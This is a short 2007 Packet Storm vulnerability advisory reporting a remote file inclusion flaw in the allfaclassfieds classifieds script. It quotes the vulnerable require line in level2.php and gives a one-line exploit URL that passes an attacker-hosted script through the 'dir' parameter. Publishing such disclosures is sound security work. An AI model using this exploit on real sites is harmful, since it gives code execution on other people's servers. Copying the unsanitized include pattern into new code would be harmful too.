allfa-rfi.txt

2007-04-24T00:00:00
ID PACKETSTORM:56166
Type packetstorm
Reporter Dr.RoVeR
Modified 2007-04-24T00:00:00

Description

                                        
                                            `Allfaclassfieds (level2.php dir) remote file inclusion  
  
--  
Bug Found By Dr.RoVeR -->Arab48 Hacker  
  
Contact: Dr.RoVeR@HackerMail.CoM  
---  
  
Script: allfaclassfieds  
  
  
Download: http://scriptat.com/download.php?sid=718  
--  
  
Bug File: level2.php  
  
Bug code in line 4:  
require("$dir/admin/dp.php");  
  
--  
  
Exploit:  
http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]  
  
  
  
--   
`